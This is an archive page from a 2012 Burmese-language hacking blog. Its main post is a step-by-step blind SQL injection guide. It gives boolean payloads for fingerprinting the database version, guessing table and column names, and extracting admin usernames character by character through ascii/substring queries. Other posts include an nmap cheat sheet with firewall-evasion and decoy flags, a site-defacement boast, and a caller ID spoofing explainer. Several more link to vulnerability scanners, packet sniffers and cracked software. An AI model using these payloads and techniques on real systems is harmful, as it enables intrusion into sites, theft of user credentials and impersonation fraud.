Thursday, September 13, 2012

Blind Sql Inj3cti0n Yummy Guide

Posted Image


၀ … ပထမဆုံးေျပာခ်င္တာက … Blind ကသိပ္အခ်ိန္ကုန္လုိ. ၀ တုိ. … အေနနဲ. Tool သုံးမယ္ဆုိရင္ဘာမွေ၀ဖန္စရာမရိွပါဘူး…. သုံးခ်င္တာသုံးၾကပါ … ဟဲဟဲ…
ဒါပင္မယ့္လည္း … ဘယ္လုိဘယ္လုိ … လုပ္သလဲဆုိတဲ့နည္းေလးတိထားရင္ေကာ မေကာင္းဘူးလား… ??
ဒါေၾကာင့္ဒီဟာကုိေရးတာပါ…
Blind ကိုဘာလုိ.သံုးရသလဲဆုိေတာ့ … DB ထဲမွာ “information_schema” ဆုိတဲ့ Table ေလးမရိွတာေၾကာင့္ Union ေတြဘာေတြနဲ. Data ကုိထုတ္လုိ.မရဘူး … (version ေအာက္ေနလုိ.ေပါ့)

[+]Blind ၂မ်ိဳးရွိပါတယ္ …
၁.Boolean Based (normal blind)
2.Time Based (time delay)
အဲကလုိေပါ့ …

[1]Boolean
ဥပမာ … ၀တုိ.မွာ … ေဟာဒီ error ျဖစ္ေနတဲ့ ဆုိဒ္ေလးရွိတယ္… ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13

#သူ.ကို single quote ( ‘ ) ေလးနဲ.စမ္းျပီး… ေနာက္ဆုံး version ေအာက္ေနေတာ့ ေရွ.ဆက္လုိ.မရဘူးဆုိပါေတာ့

#တခ်ိဳ.ဆုိဒ္ေတြက … single-quote(‘) နဲ.စမ္းမရဘူး … ဒါဆုိ Boolean Logic (True or False)ကုိသုံးပါမယ္ … Boolean ကေတာ့ အလယ္ရာစုက…သခၤ်ာပညာရွင္ၾကီးပါ … Programmer ကုိကုိေတြ ေကာင္းေကာင္းသိၾကပါတယ္…
အဲဒီေတာ့ ေစာေစာကဆုိက္ရဲ. Variable ေနာက္မွာ
and 1=1
ဆုိျပီးထည့္ကာစမ္းလုိက္ပါမယ္…
www.နတ္ဆုိး.net/index.php?catid=13 and 1=1
webpage ကပုံမွန္ပဲတက္လာတယ္ … no error
ဘာလုိ.ဆုိေတာ့ … တစ္က တစ္နဲ.ညီတယ္ဆုိတာ ကေလးေတာင္တိတယ္…ေလ… ဘာလို.error ျပရမွာလဲဟုတ္စ…
ဒီတစ္ခါ
and 1=2

ဒါဆုိရင္ link က

www.နတ္ဆုိး.net/index.php?catid=13 and 1=2

webpage ကုိသတိထားၾကည့္ပါ…. ပုံတစ္ခ်ိဳ. … စာတစ္ခ်ဳိ.ေျပာက္ေနျပီဆုိိ… error ေပါက္ေနပါျပီ…
1=2 ပဲစမ္းရမယ္လုိ. ပုံေသမရိွပါဘူး… logic အရမွားေနတာေတြၾကိဳက္တာစမ္းလုိ.ရတယ္…. ဥပမာ…
www.နတ္ဆုိး.net/index.php?catid=13 100000000001-100000000001=0
www.နတ္ဆုိး.net/index.php?catid=13 100000000001-100000000001=2
အဲလုိမ်ိဳးလဲရေသးတယ္…

#Version
and substring(@@version,1,1)=VERSION
version ဆိုတဲ့ေနရာေလးမွာ 4 တစ္ခါ 5 တစ္ခါထည့္ပါမယ္…
ဒီေတာ့ျဖစ္လာမယ့္ ပုံစံေလးက…

www.နတ္ဆုိး.net/index.php?catid=13 and substring(@@version,1,1)=4
page မွန္မွန္ကန္ကန္တက္တဲ့ဟာက … အဲဒီ့ version ေပါ့ … ဟုတ္ဖူူးလား…

#TableName
 and (SELECT 1 from TABLENAME limit 0,1)=1

table-name ဆုိတဲ့ေနရာမွာ … ကုိယ္ခန္.မွန္းလုိ. ရသေလာက္ tblname ေတြခန္.မွန္းျပီးထည့္ပါ…
ဒီေတာ့ျဖစ္လာမယ့္ပုံစံက…

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT 1 from မရွိတဲ့tablename limit 0,1)=1

ဒါဆုိ. … tablename ကတကယ္မရွိတာေၾကာင့္ page က error ေတြနဲ.တက္လာပါတယ္… ဒါဆုိဆက္ျပီးစမ္းပါ …
users ဆုိတဲ့ table တစ္ခုခ်ိတယ္.... ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT 1 from users limit 0,1)=1

users ဆုိတဲ့ Table ရွွိတာေၾကာင့္ page ကပုံမွန္တက္လာပါျပီ … notepad မွာ ကုိုယ္သိျပီးတဲ့ tablename ကုိ ခဏမွတ္ထားပါ….

#Columns

and (SELECT substring(concat(1,ColumnName),1,1) from TableName limit 0,1)=1

TableName = ေစာေစာက ကုိယ္သိျပီးတဲ့ tblname
ColumnName = အခုကုိယ္မွန္းထည့္ရမယ့္ colname

ဒါဆုိ ပုံစံက …

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT substring(concat(1,မရွိတဲ့Columnname),1,1) from users limit 0,1)=1

page ပုံမွန္မတက္ပါ… ဘာလုိ.ဆုိေတာ့ … column name တကယ္ မရွိတာေၾကာင့္ပါ…
admin ဆုိတဲ့ ... column ရွိတယ္ဆုိပါစုိ.

www.နတ္ဆုိး.net/index.php?catid=13 and (SELECT substring(concat(1,admin),1,1) from users limit 0,1)=1

page ပုံမွန္တက္လာျပီ… ဒါဆုိ admin ဆိုတဲ့ column ရိွလုိ.ေပါ့

#Getting Data
အခု data ထုတ္ဖုိ. … ေအာက္က query ကုိသုံးမယ္…
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

COLUMN = ေစာေစာကကုိယ္သိခဲ့တဲ့ admin column
TABLE = ေစာေစာကကုိယ္သိခဲ့တဲ့ table name

www.asciitable.com ကုိေသာ္လည္းေကာင္း … hackbar က text-hex ကုိေသာ္လည္းေကာင္း http://easycalculation.com/ascii-hex.php ကုိေသာ္လည္းေကာင္းသြားပါ

ASCII VALUE HERE= ဆိုတဲ့ေနရာမွာ … data ရဲ. Ascii value ေတြကုိမွန္းထည့္မွာပါ
ပုံမွန္ site ေတြမွာ username ကုိ special Character ေတြ ...ေပးမထည့္ပါ ... ဒါေၾကာင့္ special character တစ္ခုျဖစ္တဲ့ @ နဲ. စျပီးစစ္ပါမယ္
@ ရဲ. Ascii value က 64 ပါ … ဒါေၾကာင့္အခုလုိ …
and ascii(substring((SELECT concat(admin) from users WHERE id=1),1,1))>64

page မွန္မွန္ကန္ကန္မတက္ဘူး… ဒါဆုိ… username က @ နဲ.မစတာေသခ်ာသြားျပီ … 64 ကုိဆက္တိုးျပီးမွန္းၾကည့္ပါတယ္….
ဆုိပါစုိ. Admin name က john လုိ.
J ရဲ. Ascii value က 106
ဒါေၾကာင့္ပုံစံက ….

and ascii(substring((SELECT concat(admin) from users WHERE id=1),1,1))>105

page မွန္မွန္ကန္ကန္တက္လာမယ္ … ဘာလုိ.ဆုိေတာ့ j ဆုိတဲ့ value ကတကယ္ရွိေနလုိ. Ascii value က 105 …
အဲဒီမွာ 106 လုိ.ေျပာင္းထည့္ၾကည့္လိုက္ရင္… error တက္လာမယ္ ဒါဆုိ. … 106ကို table မွာသြားဖတ္ရင္ … j လုိ.ေတြ.ရလိမ့္မယ္…
ခ်ဳံေျပာရရင္ … error မတက္မခ်င္းေရွ.တုိး… error တက္ရင္ရပ္ … ျပီးရင္ table မွာသြားဖတ္ေပါ့ ….

ပထမတစ္ေနရာျဖစ္တဲ့ 1,1 ကျပီးသြားျပီ…
ဒုတိယေနရာျဖစ္တဲ့ 2,1 ကုိေစာေစာကနည္းအတုိင္းစမ္းပါ… “O”ရရင္…
စုစုေပါင္း.. 2 လုံးရပါျပီ… “ j၀ “ ဒီနည္းအတုိင္း…. ဆက္ျပီးစမ္းၾကည့္ပါ…
ေတာ္ေတာ္ကုိ …အခ်ိန္ကုန္တဲ့ method မုိ. … ဦးဦး mhu@larm ေပးထားတဲ့
List of Table & columns ေတြကုိ … copy paste လုပ္ျပီး… Havij လုိ tool မ်ိဳးမွာ … ထပ္ေပါင္းထည့္ေပးလုိက္ရင္တူူတုိ.က …. AUTO လုပ္ေပးမွာေပါ့… ဟုတ္ဖူးလား….

[2]Time delay ကုိေရးခ်င္ေတာ့ဖူး…. ဘာလုိ.ဆုိေတာ့ … ကိုယ္ႏိုင္ငံ connection ကသိတဲ့အတုိင္းပဲ … အဲဒီ့နည္းက … page loading လုပ္မယ့္အခ်ိန္ကုိ … ကန္.သတ္လုိက္ျပီး… error ေပါက္မေပါက္စစ္တာ …
ဒီမွာစစ္ေနရင္ေတာ့ … ၁နာရီၾကာမွ တစ္ခါတက္တဲ့ loading ဆုိေတာ့ …. ဟူး……
G00Gle မွာအမ်ားၾကီးပါ… ရွာၾကည့္ၾကည့္ေပါ့… မေတြ.ရင္လည္းေျပာေပ့ါ ….

ဒီနည္းေတြပဲလားဆုိေတာ့ ... ဟုတ္ပါဖူး... တျခားနည္းေတြလည္းရွိေသးတာေပါ့
Error Based နဲ.လည္း... ထုိးလုိ.ရပါေသးတယ္...

copy from http://mmhackforums.com//index.php?/topic/814-blind-sql-inj3cti0n-yummy-guide/
Read More ->>

Sunday, September 9, 2012

www.mmcybersecurityteam.net is hacked



http://www.mmcybersecurityteam.net

own by IT^J0k3r
Read More ->>

Tuesday, September 4, 2012

RAR and Zip Pass Cracker Tools

Read More ->>

Nmap Kung-Fu {Basic Scanning technique}


Nmap ဆိုတာနဲ ့ pentest သမားေတြေကာ ဟက္ကာၾကီးေတြေကာ လက္စြဲထားရတာ ၾကားဖူးၾကမယ္ထင္ပါတယ္ ... host / server / system တစ္ခု စေဖာက္ဖို ့ဆို အရင္ဆံုး/ပထမဆံုး step အၿဖစ္ nmap ကအဓိကေနရာက ပါဝင္လုပ္ေဆာင္ပါတယ္ ... window သမားေတြအတြက္လည္းရွိပါတယ္.. ဒါေပမယ့္ window မွာသံုးရတာေတာ့ တမ်ိဳးပဲဗ် က်ေနာ့္အထင္ ... Posted Image

nmap ဆိုတာဘာလဲ >>>
http://nmap.org/
window သမားေတြအတြက္ >>> http://nmap.org/book/inst-windows.html
Nmap Online tool >>> http://nmap-online.com/ // မိုက္လယ္ဟ online ရွိပီးသား... ခုမွတိတယ္... ဟီး....

ေအာက္မွာ nmap ရဲ ့ basic scanning techniques ေလးေတြကိုေတြ ့ရမွာပါ ... အေတာ္အသံုးဝင္ပါတယ္ ... ခုေလာေလာဆယ္ လိုတယ္လို ့ေမာင္ဒုတ္ မေၿပာပါဖူး ... ေနာင္တစ္ခ်ိန္ လိုကိုလိုလာပါလိမ့္မယ္.. အဲ့ခ်ိန္က်ရင္ ဒီပို ့စ္ေလးကို သတိရရင္ပဲ .. ပို ့တင္ရက်ိဳး နပ္ပါတယ္ .. Posted Image

Basic Scanning Techniques

Scan a single target —> nmap [target]

Scan multiple targets —> nmap [target1,target2,etc]

Scan a list of targets —-> nmap -iL [list.txt]

Scan a range of hosts —-> nmap [range of IP addresses]

Scan an entire subnet —-> nmap [IP address/cdir]

Scan random hosts —-> nmap -iR [number]

Excluding targets from a scan —> nmap [targets] –exclude [targets]

Excluding targets using a list —> nmap [targets] –excludefile [list.txt]

Perform an aggressive scan —> nmap -A [target]

Scan an IPv6 target —> nmap -6 [target]

Discovery Options

Perform a ping scan only —> nmap -sP [target]

Don’t ping —> nmap -PN [target]

TCP SYN Ping —> nmap -PS [target]

TCP ACK ping —-> nmap -PA [target]

UDP ping —-> nmap -PU [target]

SCTP Init Ping —> nmap -PY [target]

ICMP echo ping —-> nmap -PE [target]

ICMP Timestamp ping —> nmap -PP [target]

ICMP address mask ping —> nmap -PM [target]

IP protocol ping —-> nmap -PO [target]

ARP ping —> nmap -PR [target]

Traceroute —> nmap –traceroute [target]

Force reverse DNS resolution —> nmap -R [target]

Disable reverse DNS resolution —> nmap -n [target]

Alternative DNS lookup —> nmap –system-dns [target]

Manually specify DNS servers —> nmap –dns-servers [servers] [target]

Create a host list —-> nmap -sL [targets]

Advanced Scanning Options

TCP SYN Scan —> nmap -sS [target]

TCP connect scan —-> nmap -sT [target]

UDP scan —-> nmap -sU [target]

TCP Null scan —-> nmap -sN [target]

TCP Fin scan —> nmap -sF [target]

Xmas scan —-> nmap -sX [target]

TCP ACK scan —> nmap -sA [target]

Custom TCP scan —-> nmap –scanflags [flags] [target]

IP protocol scan —-> nmap -sO [target]

Send Raw Ethernet packets —-> nmap –send-eth [target]

Send IP packets —-> nmap –send-ip [target]

Port Scanning Options

Perform a fast scan —> nmap -F [target]

Scan specific ports —-> nmap -p [ports] [target]

Scan ports by name —-> nmap -p [port name] [target]

Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]

Scan all ports —-> nmap -p “*” [target]

Scan top ports —–> nmap –top-ports [number] [target]

Perform a sequential port scan —-> nmap -r [target]

Version Detection

Operating system detection —-> nmap -O [target]

Submit TCP/IP Fingerprints —-> www.nmap.org/submit/

Attempt to guess an unknown —-> nmap -O –osscan-guess [target]

Service version detection —-> nmap -sV [target]

Troubleshooting version scans —-> nmap -sV –version-trace [target]

Perform a RPC scan —-> nmap -sR [target]

Timing Options

Timing Templates —-> nmap -T [0-5] [target]

Set the packet TTL —-> nmap –ttl [time] [target]

Minimum of parallel connections —-> nmap –min-parallelism [number] [target]

Maximum of parallel connection —-> nmap –max-parallelism [number] [target]

Minimum host group size —–> nmap –min-hostgroup [number] [targets]

Maximum host group size —-> nmap –max-hostgroup [number] [targets]

Maximum RTT timeout —–> nmap –initial-rtt-timeout [time] [target]

Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]

Maximum retries —-> nmap –max-retries [number] [target]

Host timeout —-> nmap –host-timeout [time] [target]

Minimum Scan delay —-> nmap –scan-delay [time] [target]

Maximum scan delay —-> nmap –max-scan-delay [time] [target]

Minimum packet rate —-> nmap –min-rate [number] [target]

Maximum packet rate —-> nmap –max-rate [number] [target]

Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]

Firewall Evasion Techniques

Fragment packets —-> nmap -f [target]

Specify a specific MTU —-> nmap –mtu [MTU] [target]

Use a decoy —-> nmap -D RND: [number] [target]

Idle zombie scan —> nmap -sI [zombie] [target]

Manually specify a source port —-> nmap –source-port [port] [target]

Append random data —-> nmap –data-length [size] [target]

Randomize target scan order —-> nmap –randomize-hosts [target]

Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]

Send bad checksums —-> nmap –badsum [target]

Output Options

Save output to a text file —-> nmap -oN [scan.txt] [target]

Save output to a xml file —> nmap -oX [scan.xml] [target]

Grepable output —-> nmap -oG [scan.txt] [target]

Output all supported file types —-> nmap -oA [path/filename] [target]

Periodically display statistics —-> nmap –stats-every [time] [target]

133t output —-> nmap -oS [scan.txt] [target]

Troubleshooting and debugging

Help —> nmap -h

Display Nmap version —-> nmap -V

Verbose output —-> nmap -v [target]

Debugging —-> nmap -d [target]

Display port state reason —-> nmap –reason [target]

Only display open ports —-> nmap –open [target]

Trace packets —> nmap –packet-trace [target]

Display host networking —> nmap –iflist

Specify a network interface —> nmap -e [interface] [target]

Nmap Scripting Engine

Execute individual scripts —> nmap –script [script.nse] [target]

Execute multiple scripts —-> nmap –script [expression] [target]

Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln

Execute scripts by category —-> nmap –script [category] [target]

Execute multiple scripts categories —-> nmap –script [category1,category2, etc]

Troubleshoot scripts —-> nmap –script [script] –script-trace [target]

Update the script database —-> nmap –script-updatedb

Ndiff

Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]

Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]

XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]


./preview

 
credit:http://pentestlab.wordpress.com/
copy from MHU
Read More ->>

Monday, September 3, 2012

Caller ID spoofing



ခုတေလာ cracking ေရာင္ေရာင္ hacking ေရာင္ေရာင္လုပ္ေနတာနဲ့ post ေတာင္မေရးျဖစ္ဘူးျဖစ္ေနတယ္။ ဘာေရးရမွန္းမသိတာလဲ ပါပါတယ္ :D ။ စိတ္ကူးေလးေပါက္တုန္း ဗဟုသုတ ဆိုျပီး Spoofing အေျကာင္းေလးတစ္ခ်က္ ေျပာျကည့္ရေအာင္။ သိတဲ့ အတိုင္းပဲ က်ြန္ေတာ္က mobile hacking အေျကာင္းတာဝန္ယူထားတယ္ဆိုေတာ့ Caller ID spoofing ေရးထားပါတယ္။ What is Spoofing ?? Spoofing ဆိုတာကေတာ့ hackers ေတြရဲ့ technique တစ္မ်ိုးေပါ့။ အခ်က္အလက္တစ္ခုကို သိခ်င္တဲ့ အခါမ်ိုးတို့ ဒါမွမဟုတ္ ကိုယ့္ကို မသိေစခ်င္တဲ့အခါမ်ိုးတို့မွာသံုးပါတယ္။ အဲ့ spoof ရဲ့ အဓိပဿပါယ္ ေလးက အေျကာင္းအရာတစ္စံုတစ္ကိုဟာသ အျမင္နဲ့ တုတာကို ေျပာတာပါ။ What is Caller ID spoofing?? Caller ID spoofing ဆိုတာက ဖုန္းေခါ္ခံရမယ့္လူဘက္က ေပါ္မဲ့ Caller ID ကို လာေနက် station ကမဟုတ္ပဲ တစ္ျခား number အေနနဲ့ေဖာ္ ျပနိုင္တဲ့ telephone network ရဲ့ ျဖစ္ေပါ္လာတဲ့ အေလ့အက်င့္တစ္ခုေပါ့။ ဥပမာ ျမန္မာနိုင္ငံက သူငယ္ခ်င္းတစ္ေယာက္ ကို ကိုယ္က ဒီနုိင္ငံက နံပါတ္မဟုတ္ပဲ တစ္ျခားနံပါတ္ျဖစ္ေအာင္ဖန္တီးျပီး ကိုယ္ဖုန္းနဲ့ ေခါ္တာမ်ိုးေပါ့။တစ္ဖက္လူကို မိမိ အေျကာင္း trace လိုက္လို့ မရေအာင္ လုပ္တဲ့ ပံုစံမ်ိုးျဖစ္ပါတယ္။ email spoofing လိုပဲ ဘယ္က ပို့မွန္းမသိေအာင္ ေနတဲ့ email sender အေန သေဘာမ်ိုးနဲ့ ဆက္သြယ္ျခင္းျဖစ္ပါတယ္။ ဘယ္နံပါတ္မ်ိုးမဆို Caller ID spoofing က caller ေတြ အျကိုက္ဖန္တီးေပးနုိင္ပါတယ္။ Process of Providers ရုိးရွင္းတဲ့ spoofing service တစ္ခုရဲ့ process ကို ေျပာပါ့မယ္ ။ customer တစ္ေယာက္က call spoofing company တစ္ခုမွာ Personal identification number (PIN) တစ္ခုကို ဝယ္လိုက္တယ္ အဲ့ PIN က ခု prepaid ေတြလိုေပါ့ call time အတိအက်ပါတယ္။ ဘယ္နွနာရီေျပာနုိင္မယ္ေပါ့ေလ။ အဲဒါနဲ့ customer က ေပးထားတဲ့ Company က ေပးတဲ့ number ကို dial လုပ္ သူရထားတဲ့ PIN ကို နွိပ္မယ္။ျပီးေတာ့ customer က ေခါ္မယ့္ နံပါတ္ကို နွိပ္မယ္ျပီးရင္ Caller ID ကို ေျပာင္းခ်င္တဲ့ နံပါတ္ေျပာင္းမယ္။ ဒါက User or customer ဘက္က လုပ္တာ။ အဲ့ customer နွိပ္ျပီးတာနဲ့ တျပိုင္နက္ call က ဟို receive လုပ္မယ္လူဆီကို company က လြွဲေပးလိုက္ျပီ။ အဲ့မွာ တင္ receive လုပ္တဲ့့လူဘက္မွာ ဘယ္က မွန္းမသိေသာ Caller ID ေပါ္လာျပီေပါ့။ Web-based spoofing service ေတြက provider ေတြနဲ့ အေကာင့္ေတြလုပ္။ customer ေတြကို သူတို့ website မွာ login ဝင္ျပီးရင္ form ကို ျပည့္စံုေအာင္ျဖည့္။အမ်ားစု company ေတြ ေတာင္းတဲ့ အခ်က္ေတြက ၁.source number ၂.destination number ၃.caller ID number ေတြပါပဲ။ ဥပမာအေနနဲ့ http://www.teleturd.com/ မွာသြားျကည့္လို့ရပါတယ္။တစ္ခ်ို့ company ေတြဆို အသံေျပာင္းလို့ရေအာင္ေတာင္ ထည့္ေပးပါေသးတယ္။ Caller ID spoofing ေတြကို ဘယ္လိုင္းေတြမွာ သံုးတာမ်ားလဲဆိုရင္ Voice Over Internet Protocol( VoIP)နဲ့ Primary Rate Interface(PRI)တို့မွာသံုးတာမ်ားပါတယ္။ ေနာက္ထပ္ spoofing method ေတြရွိပါေသးတယ္။ orange boxing တို့ဘာတို့ ေပါ့။ဟိုတစ္ေခါက္က က်ြန္ေတာ္ red boxing ေရးခဲ့ဖူးတယ္မလား။ ခု orange boxing ကသူ့အဆက္ :D ။ က်ြန္ေတာ္ တစ္ေခါက္ေရးေပးခဲ့တယ့္ spoofapp ဆိုတဲ့ android apk က လဲ caller id spoofing ပါပဲ။အဲ့ app ကေတာ့ US နဲ့ Canada မွာ ပဲ ရတယ္လို့ေျပာပါတယ္။ ခုေနာက္ပိုင္း spoofing နဲ့ပတ္သတ္တဲ့ apk ေတြအမ်ားျကီးထြက္လာပါေသးတယ္။ေနာက္ဆံုး က်ြန္ေတာ္သူငယ္ခ်င္းေပးတဲ့ msg spoof apk ကေတာ့ txtmyanmar.apk ပါ။အခါသင့္ အခြင့္သာရင္ orange boxing အေျကာင္းထပ္ေရးပါမယ္လို့ ကတိေပးရင္း ဒီေလာက္နဲ့ေက်နပ္မယ္လို့ထင္ပါတယ္ :D ။ စာဖတ္ပရိတ္သတ္အေပါင္း ကိုယ္ေရာစိတ္ပါက်န္းမာခ်မ္းသာပါေစ။ ဒါက ဗဟုသုတ အေနနဲ့ ေရးတာ ပါ ။ဒီနည္းေတြက Social engineering ေကာင္းရင္ ေကာင္းသေလာက္ အသံုးဝင္ပါတယ္။ထို့ေျကာင့္ ေနာက္တစ္ခုဆုေတာင္းတာက လူအခ်င္းခ်င္း လွည့္ပတ္ျခင္း ကင္းရွင္းျကပါေစလို့ :)

copy from ghostarea.net
Read More ->>

Sunday, September 2, 2012

Sony Mobile website hacked by NullCrew


ယခုႏွစ္အတြင္း ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ Sony Mobile website သည္ေနာက္ထပ္တစ္ၾကိမ္ အျဖစ္ တိုက္ ခိုက္ခံခဲ့ရပါတယ္...။ www.sonymobile.com သည္ Hacker Group တစ္ခုျဖစ္ေသာ Null Crew အဖြဲ႕ မွတိုက္ ခိုက္ခ်င္ကိုခံခဲ့ရျပီး user အမ်ားစုရဲ႕ အခ်က္အလက္မ်ားကို ဖြင့္ခ်ေဖာ္ထုတ္ ခဲ့ပါတယ္...။ဒီသတင္းအခ်က္ အလက္ကိုလဲ တိုက္ခိုက္သူမ်ားျဖစ္တဲ့ Null Crew ရဲ႕ twitter account ထဲမွာေဖာ္ျပခဲ့ျခင္းျဖစ္ပါတယ္...။

သူတို႕ဟာ ထြင္းေဖါက္ ရယူထားေသာသတင္းအခ်က္ အလက္ အစုအစည္းမ်ားကို Pastebin တြင္လဲ ေဖာ္ျပ ထားျပီး ေအာက္ပါ  သတိေပးစာကို ေဖာ္ျပခဲ့ပါတယ္....။

Stats of Dumps

  • 441 ေယာက္ေသာ အသံုးျပဳသူမ်ား၏ username မ်ား email အေကာင့္မ်ား×××××
  • Think_users Table မွ 24 ေယာက္ေသာ user မ်ား၏ Hash passwords မ်ားပါသြားျခင္း××××
  • admin_users Table မွ 3 ေယာက္ေသာ Admin မ်ား၏ အခ်က္အလက္မ်ားပါ၀င္သြားျခင္း×××××

တို႕ပဲျဖစ္ၾကပါတယ္...။

ref: http://thehackernews.com
post by shwekoyantaw
Read More ->>

[Tool]MaxISploit SQLi , XSS , Admin login and shared hosting scanner[/Tool]



HF ကရတာေနာက္ေတာ့ မွ အသံုးျပဳပံု tuto ေရးေပးမယ္...။မအားေသးလို႕ပါ...။

လိုခ်င္ရင္ေအာက္ပါလင့္ကေနယူႏိုင္ပါတယ္...။

http://code.google.com/p/maxisploit-scanner/

http://www.ziddu.com/download/20256523/MaxISploit.rar.html 

သူ႕ Function ေတြကေတာ့ေအာက္ပါအတိုင္းျဖစ္ပါတယ္...။

1.SQL injection :
a)Error based: it scans for vulnerable websites based on common SQL errors for variety of databases.
b)Difference (true/false) scan: it scans for sites that do not display SQL errors but yet are vulnerable , the concept behind this scan is true / false query to the database which will give different answers which will then be scanned and in case of difference in length and content site will be considered vulnerable.
2.XSS scanner : it encrypts XSS vector and tries to scan result from web server , if XSS vector is found inside source than site is vulnerable. It only uses GET request to web server. NOTE: It will scan for XSS vector but it will not test if alert or any other event really happened.
3.Admin scanner : it scans for admin login locations , based on default list or any other that you have supplied.Response code 200 and 306 is considered success.
4.Shared hosting scanner : it send request to sameip.org and then parses html for pages

shweko
Read More ->>

Saturday, September 1, 2012

How to get IPs on Steam (Multiple Packet Sniffers+CommView Crack)


HF ကရတဲ့ စာအုပ္ေလးပါ...။ေတာ္ေတာ္ေကာင္းတယ္ ...။ေရးထားတာရွင္းလင္းတယ္...။အသံုး၀င္မယ္ လို႕ထင္ပါတယ္...။အစကဘာသာျပန္မလို႕ပဲ မအားတာနဲ႕ ဒီအတိုင္းေလးပဲတင္ေပးလိုက္တာ...။

http://www.mediafire.com/?xzf8uanzwkteudn
Read More ->>

Gtalk မွာ Group ဖြဲ႕ၿပီး ေျပာဖို႕ Party Chat လုပ္ၾကရေအာင္

Posted Image

အုပ္စုဖြဲ႕ၿပီး Chat ၾကဖို႔အတြက္ကေတာ့ ပထမဦးဆံုး လုပ္ရမွာက http://partychapp.appspot.com/ ဆိုတဲ့ လိပ္စာေလးကို အရင္ဦးဆံုးသြားလိုက္ပါ။ အဲဒီ ဆိုဒ္ေလး ပြင့္လာၿပီဆိုတာနဲ႕ Sign in မွာ မိမိရဲ႕ Gmail account နဲ႔ ပဲ၀င္လိုက္ပါ။ အဲဒီေနာက္မွာေတာ့ ေအာက္မွာေပးးထားတဲ့ အတိုင္းလိုက္လုပ္လိုက္ပါေတာ့။
Posted Image


နံပါတ္တစ္လုပ္ရမွာက Room name လို႔ေပးထားတဲ့ ေနရာေလးမွာ မိမိစိတ္ႀကိဳက္ နာမည္ေလးတစ္ခုဖန္တီးပါ။ ဥပမာ name@partychatapp.app spotchat.com ဆိုၿပီးေတာ့ေပါ့။ ၿပီးေတာ့ Room type မွာကေတာ့ ကိုယ္ႀကိဳက္ရာကို ေရြးခြင့္ရွိပါတယ္။ တစ္ခုသိထားရမွာက Invite only မွာက ကိုယ္တိုင္ဖိတ္ေခၚ ခ်င္တဲ့သူေပါ့။ မဖိတ္ေခၚပဲနဲ႔ ၀င္လာလို႔မရဘူးေပါ့ေလ။ Open ကေတာ့ ကိုယ္ဖိတ္စရာမလိုဘူး ကိုယ့္ရဲ႕လိပ္စာကို သိရင္ ၀င္လာလို႕ရတယ္။ အဲလိုမ်ဳိးေပါ့။ Others to invite မွာေတာ့ ကိုယ္စၿပီး ဖန္တီးတဲ့အခါ ကိုယ့္နာမည္ကို ထည့္ရိုက္ဖို႕လိုပါတယ္။ ကိုယ္ပိုင္အီးေမးလ္ကို ရိုက္ရမွာေပါ့ေလ။ ၿပီးေတာ့ Create ကို ကလစ္ႏွိပ္လိုက္ရင္ ေအာက္မွာ ေဖာ္ျပထားတဲ့ ပံုေလးေပၚလာလိမ္မယ္။
Posted Image

ၿပီးသြားတဲ့အခ်ိန္မွာေတာ့ သင့္ရဲ႕ Gtalk ထဲမွာ အခုလိုမ်ဳိးလာေပၚေနပါလိမ့္မယ္။
Posted Image

အဲဒီအခါ က်ရင္ သင္က yes လုပ္လိုက္ရုံေပါ့။ သင္ဖန္တီးခဲ့တဲ့ နာမည္ေတြနဲ႔ပဲလာေပၚပါလိမ့္မယ္။ အခုျပထားတာက နမူနာပံုေလးပါ။ ၿပီးရင္ေတာ့ သင့္ Gtalk ထဲမွာ အဲဒီ ဖန္တီးခဲ့တဲ့ နာမည္ေလးက အေရာင္ေလးလင္းေနပါလိမ့္မယ္။ အဲဒီေနာက္မွာေတာ့ သင္ဖိတ္ေခၚခ်င္တဲ့သူေတြကို ဖိတ္ေခၚႏိုင္ပါၿပီ။ အဲလိုဖိတ္ေခၚဖို႔အတြက္လည္း သင္က အခုေပးထားတဲ့ ပံုစံေတြအတိုင္းပဲ ရိုက္ထည့္ရပါလိမ့္မယ္။ /invite name@gmail.com က သင္ ဖိတ္ေခၚခ်င္တဲ့သူအတြက္ပါ။ /list ကေတာ့ သင္နဲ႔အတူ ဘယ္ႏွစ္ေယာက္ရွိလဲဆိုတာ ၾကည့္တာေပါ့။ ျပန္ထြက္ခ်င္ရင္ေတာ့ /exit ရိုက္လို႔လည္းရပါတယ္။ သင္ကလည္း ထြက္သြားၿပီ သူလည္းထြက္သြားၿပီ ေနာက္ေန႔ ေတြ႕ ၾကတဲ့အခါမွာေတာ့ ျပန္လည္ၿပီးေတာ့ /invite name@gmail.com ကို ျပန္လည္ရိုက္ၿပီးေတာ့ ေခၚႏိုင္ပါတယ္။ အဆင္ေျပၾကပါေစ။ ေအာက္မွာေပးထားထာကေတာ့ မူရင္းဆိုဒ္က ရိုက္ပံုရိုက္နည္းေတြပါ။

/leave Leave this chat room. You can rejoin by sending another message to the room. If the room is invite-only, you may need to be re-invited.
/list See who is in the chat room.
/alias newalias Change what name you show up as in the room.
/inviteonly Toggle whether this room is invite only.
/invite someemail Invite someone to the room.
/me someaction Tell the room what you’re up to.
If you type /me is rolling his eyes, everyone sees [youralias] is rolling his eyes.
credit:zawhlainghtun
ref:MHU
Read More ->>

[#][#][#] BHG မွ r00tcreat0r ၏ Buffero Overflow စာအုပ္ေလးပါ ~~~~~





Download >>> http://www.mediafire...fbkdwqbc53khoav

copy from MHU
Read More ->>

၀ိကိလိခ္ ၏ အတြင္းေရးမ်ား ( အပိုင္း ၁ မွ ၇ ) ထိ


